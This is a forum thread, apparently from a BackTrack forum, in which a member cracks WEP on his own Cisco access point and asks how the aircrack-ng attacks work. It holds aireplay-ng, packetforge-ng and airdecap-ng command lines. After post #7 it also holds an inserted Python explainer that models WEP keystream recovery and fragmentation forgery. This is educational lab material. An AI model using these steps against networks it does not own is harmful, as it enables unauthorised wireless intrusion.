Page 1 of 2 (results 1 to 10 of 14)

Thread: The theory work

  1. #1
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default The theory work

    Hi guys

Not been able to keep up for a long time, but decided now was a good time to start re-familiarising myself with BT and tools (and Linux ._.)

    I have decided that a nice simple 40bit WEP Crack with no clients would be a nice way to refamiliarise myself with stuff. So I have setup a Cisco Aironet 1100 for this purpose.

Following Xploitz's vid (nicely done btw) and I have everything down except the last part - for reference this is the order I have things running.

    1. Started card in monitor mode (WG511T)
    2. Started Airodump-ng, filtered to only show the right channel and ssid
    3. Used Aireplay-ng to fake auth my laptop (successful)
    4. Ran Aireplay -3 and within seconds I got a healthy number of ARP and hovering around 500pps. Airodump reflects this also.
    5. Restarted Airodump to capture to a file
    6. Started Aircrack to start working on the key (just set at 1234567890)

So it's been running for around 40 mins, and only 8 IVs. Tried re-authing and restarted -3, all the numbers look healthy, but no unique IVs.

    Here's the catch - instead of just saying "Oh you need this command" or "gfto and look it up", I would like the kind members to either explain why, or link me. I have (and still am) looking but was hoping to speed the process up!

EDIT: Well I just re-read my post and it doesn't really portray what I am after... I am very interested in the packet-level theory, so if any of you feel the need to indulge me on what is going on at each stage, please feel free ^^ (or link; all I can find are guides like "Do this and do that, hey presto!")

EDIT2: Tried with a real client and cracked it in 46s... now I know it has to be something to do with fake auth, and not a command I missed etc.

  2. #2
    Senior Member
    Join Date
    Feb 2008
    Posts
    681

    Default

    Quote Originally Posted by hongman View Post

EDIT: Well I just re-read my post and it doesn't really portray what I am after... I am very interested in the packet-level theory, so if any of you feel the need to indulge me on what is going on at each stage, please feel free ^^ (or link; all I can find are guides like "Do this and do that, hey presto!")

EDIT2: Tried with a real client and cracked it in 46s... now I know it has to be something to do with fake auth, and not a command I missed etc.
    lmao, that's a first. I appreciate your honesty.

    As well as the tutorials here, the aircrack tutorials section is an awesome resource.
    http://www.aircrack-ng.org/doku.php?id=tutorial
hehe...

  3. #3
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default

    Thanks.

    Having too much information is just as frustrating at times as having too little...10 guides showing different ways, some outdated, etc etc....gets a bit daunting :P

    All in good time.

    Thanks again.

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

If you have no clients connected there are 2 other attacks which are designed for that: -5 (frag) and -4 (chop).

  5. #5
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default

Thanks, I'll look those up!

  6. #6
Senior Member shamanvirtuel
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

and the interactive replay with a forged FromDS/broadcast header
Code:
# ath0 = your monitor-mode interface; CLIMAC = the MAC you fake-authenticated with
aireplay-ng -2 -p 0841 -F -c FF:FF:FF:FF:FF:FF -b APMAC -h CLIMAC ath0

also works well but is a little longer
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  7. #7
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default

Hmm, a little confused now I just tried it. I think it will make my lack of understanding of these protocols evident >.<

    At first I thought I would try the Fragmentation Attack, after reading about it on aircrack-ng.org.

    So (following the guide on aircrack-ng.org):

    1. Fired up airodump-ng, set channel and bssid
    2. Fake Auth
    3.
    Code:
    aireplay-ng -5 -b APMAC ath0
    4. Selected "Yes" on first packet, got my .xor file
    5.
    Code:
    packetforge-ng -0 -a APMAC -h CLIENTMAC -k RANDOMIP -l RANDOMIP2 -y fragment.xor -w arp-request
    6.
    Code:
    airdecap-ng -w 1234567890 arp-request
    7.
    Code:
    tcpdump -n -vvv -e -s0 -r arp-request-dec
    Stop!

From Step 3 down, I'm not really sure what or why I am doing these things! Which is kind of pointless - if I don't understand an attack, it's no good.

    I have read the correspondence on various links, guess I need to read some more. But some key questions I have about the process so far which have come to mind:

1. Are the Fragmentation attack and the Interactive Packet Replay attack part of the same natural attack process, or are they completely separate? Just that part 8 of this process is using -2 (this is when I decided to stop to get some understanding)

2. In part 6, using airdecap-ng - it says to input the WEP key to decrypt the packet/fragment - isn't this a bit pointless if the exercise is to retrieve the key? Or is this for demonstration purposes (i.e. an extra step to show how it works)

    Thanks for bearing with me ^^;
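The packet-level theory asked for in the post above, as an added example that is not part of the thread or of the aircrack-ng project: a toy model of what aireplay-ng -5 and packetforge-ng (post #7), the ARP replay (post #1) and the -2 interactive replay (post #6) all rely on. WEP encrypts each frame with RC4 seeded by IV||key, so ciphertext XOR known plaintext gives the keystream for that IV, and anyone holding the keystream can forge a valid frame with a correct ICV without ever knowing the key. RC4 and the WEP body layout are the real algorithms; the 802.11 header is omitted, the AP only reassembles fragments and relays the result, and the key, IVs, MACs and IPs are constructed sample values.

```python
"""Toy WEP keystream recovery + fragmentation forgery (added example, not aircrack-ng code)."""
import struct
import zlib

AP_KEY = bytes.fromhex("1234567890")              # 40-bit key; the attacker functions never read it
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")  # first 8 plaintext bytes of every ARP frame


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); WEP seeds it with IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32, little-endian, encrypted together with the data."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV(3) || KeyID(1) || RC4(IV||key, plaintext || ICV)."""
    return iv + b"\x00" + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, body: bytes):
    """Returns (iv, plaintext, icv_ok); a real AP silently drops frames with a bad ICV."""
    iv, ct = body[:3], body[4:]
    pt = rc4(iv + key, ct)
    return iv, pt[:-4], pt[-4:] == icv(pt[:-4])


def arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP + ARP request (36 bytes), the layout packetforge-ng -0 builds."""
    return LLC_SNAP_ARP + struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1,
                                      sender_mac, sender_ip, b"\x00" * 6, target_ip)


# ---- attacker side: ciphertext plus guessed plaintext only, never AP_KEY ----

def recover_prga(body: bytes, known_plaintext: bytes):
    """ciphertext XOR plaintext = RC4 keystream (PRGA) for this frame's IV (the .xor file)."""
    iv, ct = body[:3], body[4:]
    return iv, bytes(c ^ p for c, p in zip(ct, known_plaintext))


def forge(iv: bytes, prga: bytes, plaintext: bytes) -> bytes:
    """Encrypt plaintext || ICV with keystream alone; needs len(plaintext)+4 keystream bytes."""
    pt = plaintext + icv(plaintext)
    if len(pt) > len(prga):
        raise ValueError("need %d keystream bytes, have %d" % (len(pt), len(prga)))
    return iv + b"\x00" + bytes(p ^ k for p, k in zip(pt, prga))


# ---- AP side: has the key, reassembles fragments, relays the whole frame ----

def ap_relay(key: bytes, fragments, relay_iv: bytes) -> bytes:
    data = b""
    for frag in fragments:
        _, chunk, ok = wep_decrypt(key, frag)
        if not ok:
            raise ValueError("bad ICV, fragment dropped")
        data += chunk
    return wep_encrypt(key, relay_iv, data)   # re-encrypted under an IV the AP picks


def fragmentation_attack(observed: bytes, relay_iv: bytes, payload_len: int = 64):
    """Turn 8 known keystream bytes into enough keystream to forge a whole ARP request."""
    iv, short_prga = recover_prga(observed, LLC_SNAP_ARP)          # 8 bytes of PRGA
    payload = (LLC_SNAP_ARP + b"\x00" * payload_len)[:payload_len]  # any plaintext we choose
    # 8 bytes of PRGA cover 4 data bytes + the 4-byte ICV, so send 4-byte fragments
    frags = [forge(iv, short_prga, payload[i:i + 4]) for i in range(0, len(payload), 4)]
    relayed = ap_relay(AP_KEY, frags, relay_iv)                     # AP reassembles for us
    # we know every plaintext byte of the relayed frame, so XOR yields a long PRGA
    return recover_prga(relayed, payload + icv(payload))


def demo():
    """Returns (short_prga_correct, long_prga_len, forged_icv_ok, forged_plaintext_ok)."""
    ap_iv = bytes.fromhex("0a0b0c")   # constructed: the AP broadcasting one ARP request
    observed = wep_encrypt(AP_KEY, ap_iv, arp_request(b"\x00\x11\x22\x33\x44\x55",
                                                      b"\xc0\xa8\x01\x01", b"\xc0\xa8\x01\x02"))
    _, short_prga = recover_prga(observed, LLC_SNAP_ARP)
    short_ok = short_prga == rc4(ap_iv + AP_KEY, b"\x00" * 8)   # check only; uses the key
    long_iv, long_prga = fragmentation_attack(observed, relay_iv=bytes.fromhex("a1b2c3"))
    wanted = arp_request(b"\x00\xde\xad\xbe\xef\x00", b"\xc0\xa8\x01\x64", b"\xc0\xa8\x01\x01")
    forged = forge(long_iv, long_prga, wanted)       # what aireplay-ng -2 then replays
    # the airdecap-ng -w <key> step: verification only, which is why it needs the key
    _, pt, ok = wep_decrypt(AP_KEY, forged)
    return short_ok, len(long_prga), ok, pt == wanted


if __name__ == "__main__":
    print(demo())
```

The two questions in the post map onto this directly: the fragmentation attack (-5) exists only to obtain a long keystream for one IV, packetforge-ng turns that keystream into a forged ARP request, and -2 replays it so the AP answers with fresh IVs for aircrack-ng to collect; airdecap-ng with the known key is a sanity check on the forged packet, not part of the attack. The reuse of one IV's keystream is also why replaying the same forged frame is harmless to the attacker: the new IVs come from the AP's replies, not from the injected frame.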

  8. #8

    Default

    If you want a real step-by-step tutorial, check out n00bhacker.blogspot.com Use the Table of Contents on top to get to the part you want

    Quote Originally Posted by hongman View Post
Hmm, a little confused now I just tried it. I think it will make my lack of understanding of these protocols evident >.<
[...]

  9. #9
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default

    Reading now, thanks for the linky

  10. #10
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default

Hmm, read through the relevant sections, unfortunately he doesn't touch on frag attacks
